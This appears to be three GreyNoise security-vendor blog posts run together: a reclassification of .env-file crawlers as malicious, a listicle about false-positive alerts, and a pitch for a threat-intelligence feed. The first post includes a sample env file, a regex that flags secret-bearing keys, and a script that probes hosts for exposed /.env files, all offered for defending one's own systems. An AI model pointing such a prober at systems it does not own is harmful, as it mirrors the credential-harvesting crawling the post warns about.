On Tuesday, April 25, 2023, GreyNoise is changing how we classify environment file crawlers from unknown intent to malicious intent.  At the time of publication, this change will result in the reclassification of over 11,000 IPs as malicious.  Users who use GreyNoise’s malicious tag to block IPs based on malicious intent will see an increase in blocked IPs.

Background

An environment file crawler is a bot that scours the internet for publicly available env files. These files have been popular for over a decade and are used to pass dynamic environment variables to software and services.

Environment files are dotfiles: files that are hidden from the user by default but are editable by any text editor and contain configuration settings for various applications. An example of an environment file is:

APP_NAME=The App
APP_ENV=dev

DB_CONNECTION=mysql
DB_HOST=127.0.0.1
DB_PORT=3306
DB_DATABASE=theappdb
DB_USERNAME=thedatabaseuser
DB_PASSWORD=theappsecretpassword
API_KEY=abc123def456

Why are attackers so interested in env files?

They almost always contain sensitive data such as authentication information (e.g., keys or passwords) and often the specific connection paths those credentials belong to. For this reason, env files should never be exposed publicly; anyone who obtains the file can potentially access sensitive information. Adding insult to injury, organizations are often unaware that they are exposing these files to the public, and these crawlers have historically been overlooked.
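To make the risk concrete, here is a minimal sketch that parses the example file above and flags the keys a crawler would care about. The list of "sensitive" name patterns is a hypothetical heuristic chosen for this example, not a GreyNoise detection rule.

```python
import re

# Hypothetical heuristic: key names that usually hold secrets.
SENSITIVE_KEY = re.compile(
    r"(PASSWORD|PASSWD|SECRET|TOKEN|API_KEY|PRIVATE_KEY)", re.IGNORECASE
)


def parse_env(text):
    """Parse KEY=VALUE lines, skipping blank lines and '#' comments."""
    values = {}
    for line in text.splitlines():
        line = line.strip()
        if not line or line.startswith("#") or "=" not in line:
            continue
        key, _, value = line.partition("=")
        values[key.strip()] = value.strip().strip('"').strip("'")
    return values


def sensitive_keys(values):
    """Return the sorted key names that look like credentials."""
    return sorted(key for key in values if SENSITIVE_KEY.search(key))


SAMPLE_ENV = """\
APP_NAME=The App
APP_ENV=dev

DB_CONNECTION=mysql
DB_HOST=127.0.0.1
DB_PORT=3306
DB_DATABASE=theappdb
DB_USERNAME=thedatabaseuser
DB_PASSWORD=theappsecretpassword
API_KEY=abc123def456
"""

if __name__ == "__main__":
    print(sensitive_keys(parse_env(SAMPLE_ENV)))
```

Even this tiny file yields a database password and an API key, alongside the host, port, and username needed to use them.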

What is GreyNoise changing?

For years, GreyNoise has monitored env scanners and classified them as unknown intent. However, we continuously strive to enhance our datasets to safeguard organizations and increase the effectiveness of SOCs; thus, we have decided to reclassify these crawlers as malicious. 

Click/tap here for more information on GreyNoise classifications.

The reclassification of intent will affect the following tags:

Why the change?

These files should never be publicly exposed since they typically contain sensitive information; the internet noise generated by the constant searching for these files is indicative of the scale of opportunistic attackers looking for credentials.

Using environment files to compromise organizations is a well-established tactic

There are numerous CVEs that involve env files, through either information disclosure or code execution, including but not limited to:

Final thoughts:

Organizations should take proactive measures to regularly look for exposed .env files; scanning once won’t cut it as they can appear at any time. Searching for unsecured env files should be a part of an organization's vulnerability management program. If you do find a publicly available .env file for your organization, it is imperative that you immediately remediate the exposure and rotate any credentials that were leaked.  GreyNoise will continue to review the classifications of our tags to ensure their efficacy.
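One way to make that check repeatable is a small script run on a schedule against hosts you own. The sketch below is an assumption-laden example: the function names, the KEY=VALUE heuristic, and the single `/.env` path are all choices made for illustration, and it should only ever be pointed at your own infrastructure.

```python
import re
import urllib.error
import urllib.request

# Heuristic: a line such as DB_HOST=127.0.0.1
ENV_LINE = re.compile(r"^[A-Za-z_][A-Za-z0-9_]*=.*$")


def looks_like_env(body, min_lines=2):
    """True if every non-blank, non-comment line is KEY=VALUE."""
    lines = [line.strip() for line in body.splitlines()]
    lines = [line for line in lines if line and not line.startswith("#")]
    return len(lines) >= min_lines and all(ENV_LINE.match(line) for line in lines)


def http_get(url, timeout=5):
    """Return (status, body); network errors become status 0 and an empty body."""
    try:
        with urllib.request.urlopen(url, timeout=timeout) as resp:
            return resp.status, resp.read(65536).decode("utf-8", errors="replace")
    except urllib.error.HTTPError as exc:
        return exc.code, ""
    except (urllib.error.URLError, OSError):
        return 0, ""


def find_exposed_env(base_urls, fetch=http_get):
    """Check <base>/.env on each host and return the URLs that serve an env file."""
    exposed = []
    for base in base_urls:
        url = base.rstrip("/") + "/.env"
        status, body = fetch(url)
        if status == 200 and looks_like_env(body):
            exposed.append(url)
    return exposed
```

The `fetch` parameter exists so the check can be exercised without network access; a real run would call `find_exposed_env` with a list of your own base URLs and alert on any non-empty result.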

Sign up for a free GreyNoise account or request a demo to see how GreyNoise can help provide immediate protection from threats like these, especially when activity mutates from “unknown” or “benign” to “malicious.”

Get Started With GreyNoise for Free

10 Things You Could Do With Your Time Instead of Triaging a False Positive Alert

Spoiler Alert: It’s a lot…

SOC teams have struggled with false positive alerts since, well, the beginning of security centers. There are a lot of studies (by security vendors) on how much time SOC analysts spend on false positive alerts. Unfortunately, we are not IPO rich (yet) - so we didn’t conduct our own study - but we did take the average from a few (1, 2, 3) reports. According to our sources, a single analyst wastes an average of 8.4 hours per week triaging false positive alerts.* 

GreyNoise can help SOC teams reduce false positives by providing context to the alerts on internet-wide scanners, crawlers, and other suspicious activity that may trigger false alarms. How many times have you gotten an alert that turned out to be [insert security company] just scanning the internet?

Pictured: A security analyst, presumably, after discovering the alert they just got was actually GoogleBot.

 

By integrating GreyNoise into your alerting workflow, your team can eliminate background noise and focus on the most actionable and relevant alerts.

So what can you do with ~8+ hours of your life back each week?

  1. Make this delicious Lemon cheesecake recipe
  2. Knit this Lace shawl
  3. Hike the Inca Trail of Machu Picchu
  4. Build a coffee table
  5. Run a 50m (ultra?)marathon 
  6. Go Scuba diving, twice
  7. Tour the entire country of Monaco
  8. Listen to the longest continuous orchestral piece in history 
  9. Watch the first three of the Fast and Furious movies
  10. Give yourself an NFC manicure 

By using GreyNoise to filter out benign internet scanners, SOC teams can improve decision-making, reduce alert fatigue, and enable teams to focus their time and resources on genuine threats. Start exploring our data today.
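The filtering idea can be sketched in a few lines. Everything here is hypothetical: the lookup table stands in for whatever IP-context source your pipeline uses, and the alert fields, IPs (from documentation ranges), and names are invented for the example.

```python
# Hypothetical IP-context table standing in for a real enrichment source.
KNOWN_CONTEXT = {
    "192.0.2.10": {"classification": "benign", "name": "ExampleSearchBot"},
    "198.51.100.7": {"classification": "malicious", "name": "unknown"},
}


def triage(alerts, context=KNOWN_CONTEXT):
    """Split alerts into (needs_review, suppressed).

    Alerts whose source IP is a known benign scanner are suppressed;
    everything else, including IPs with no context, stays in the queue.
    """
    needs_review, suppressed = [], []
    for alert in alerts:
        info = context.get(alert["src_ip"])
        if info is not None and info["classification"] == "benign":
            suppressed.append(alert)
        else:
            needs_review.append(alert)
    return needs_review, suppressed


ALERTS = [
    {"id": 1, "src_ip": "192.0.2.10", "rule": "port scan"},
    {"id": 2, "src_ip": "198.51.100.7", "rule": "exploit attempt"},
    {"id": 3, "src_ip": "203.0.113.99", "rule": "login failure"},
]

if __name__ == "__main__":
    review, quiet = triage(ALERTS)
    print([a["id"] for a in review], [a["id"] for a in quiet])
```

Unknown IPs deliberately stay in the review queue, so the filter only removes alerts it has positive evidence are noise.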

*Yes, we know that the actual time spent varies based on the size of the security team and organization.


Beyond the Noise: Why GreyNoise Malicious Feed is a Must-Have for Anomali Users

We recently built out a new Premium Feed for Anomali ThreatStream. Anomali customers can now pull in all malicious IPs GreyNoise has seen hitting our sensors in the past 24 hours, on a daily basis. 

While most feeds in Anomali are used to build lists of observables that will trigger alerts or investigations within their other security tools, GreyNoise is not your typical threat feed and should be treated differently. In this post, we’ll walk through how Anomali users should leverage the GreyNoise feed, how you can access a trial, and a couple other loose ends.

GreyNoise Malicious Feed in Anomali

Observables that show up in the GreyNoise Malicious Threat Feed in Anomali all have three things in common: 

  1. They are part of our Noise data set, which means they have been seen scanning the internet in the past 24 hours BY GreyNoise (we are the first-hand collector of our data)
  2. In the past 30 days, they’ve done something GreyNoise determined to have malicious intent when interacting with our sensor network
  3. They are NOT benign actors with a legitimate reason for scanning the internet, whose activity may look suspicious but would ultimately be a waste of time to investigate or could have negative consequences if blocked.
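The three criteria above can be read as a simple predicate. The sketch below is an illustration only: the record fields (`last_seen`, `last_malicious`, `classification`) are hypothetical names chosen for this example and are not the feed's actual schema.

```python
from datetime import datetime, timedelta, timezone


def in_malicious_feed(record, now):
    """Apply the three criteria to a hypothetical observable record."""
    # 1. Seen scanning the internet in the past 24 hours.
    seen_recently = now - record["last_seen"] <= timedelta(hours=24)
    # 2. Did something judged malicious in the past 30 days.
    last_bad = record["last_malicious"]
    malicious_recently = last_bad is not None and now - last_bad <= timedelta(days=30)
    # 3. Not a known benign actor.
    not_benign = record["classification"] != "benign"
    return seen_recently and malicious_recently and not_benign


NOW = datetime(2023, 6, 1, 12, 0, tzinfo=timezone.utc)

EXAMPLE = {
    "last_seen": NOW - timedelta(hours=2),
    "last_malicious": NOW - timedelta(days=10),
    "classification": "malicious",
}

if __name__ == "__main__":
    print(in_malicious_feed(EXAMPLE, NOW))
```

All three conditions must hold at once, which is why an IP that was malicious last week but has since gone quiet would drop out of the feed.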

Because of these criteria, customers can trust that an observable in the GreyNoise Malicious Feed is an IP that has been seen blasting large swaths of the internet, and is likely not indicative of a targeted attack worth an analyst’s time to review.

GreyNoise’s Malicious Feed in Anomali is best used as a feed for opportunistic attack activity that should be automatically blocked. Our data is highly reliable, so many of our customers use it to drive automated actions, like blocking, to save their analysts’ time. Our malicious feed should NOT add to an analyst’s triage queue.

Try it out

To try out the GreyNoise Malicious Feed in Anomali, you need a GreyNoise account with an active Enterprise trial. Start by signing up here, then click the Activate Trial button on the GreyNoise Account page. Once the trial is enabled, grab your GreyNoise API key and head over to the Anomali Marketplace.

GreyNoise Premium Feed

In the Anomali Marketplace, find the Premium Feed for GreyNoise, then click Get Access and drop in your API key. This will provide you with 14 days of trial access to the feed.

If, after the trial, you’d like to make it a permanent feature in your Anomali instance, you can review our pricing page and reach out to the sales team with any questions. The GreyNoise Malicious Feed can be an add-on to any of our standard packages!

A Complement to other Feeds in Anomali

While we’re on the topic, we’d be remiss to not mention the original use case for GreyNoise in Anomali. For observables coming from other sources within Anomali, we provide additional context through enrichment that other services don’t. If you're triaging an event and using Anomali to understand the details of an observable, the GreyNoise Enrichment for Anomali provides you with all the details you need to understand if the IP has been observed performing internet-wide scanning and what it has been scanning for. It will also flag whether the IP belongs to a common business service from our RIOT data set, in which case blocking that IP may break something for your users.
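As a sketch of how that enrichment might feed a triage decision, the function below maps two boolean flags to a recommended action. The dictionary shape, the `noise` and `riot` key names, and the action labels are assumptions made for this example, not the fields returned by the Anomali enrichment.

```python
def recommend(ip_context):
    """Suggest a triage action from hypothetical enrichment flags.

    ip_context is assumed to be a dict with optional boolean keys:
      'riot'  - IP belongs to a common business service
      'noise' - IP has been observed scanning the internet
    """
    if ip_context.get("riot"):
        # Blocking a common business service may break things for users.
        return "do-not-block"
    if ip_context.get("noise"):
        # Internet-wide scanning is unlikely to be a targeted attack.
        return "deprioritize"
    # No context either way: leave it for an analyst.
    return "investigate"


if __name__ == "__main__":
    print(recommend({"noise": True, "riot": False}))
```

The RIOT check comes first on purpose: if an IP is both a business service and a scanner, avoiding a harmful block matters more than reducing noise.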
 


Our Anomali Enrichment feature also recently got an upgrade, with IP Similarity and IP Timeline now available if included in your GreyNoise subscription. These are great tools for folks looking for a granular view of the scanning activity observed by GreyNoise for an observable, or looking to identify other scanning IPs that may be leveraging similar scan and attack tactics.

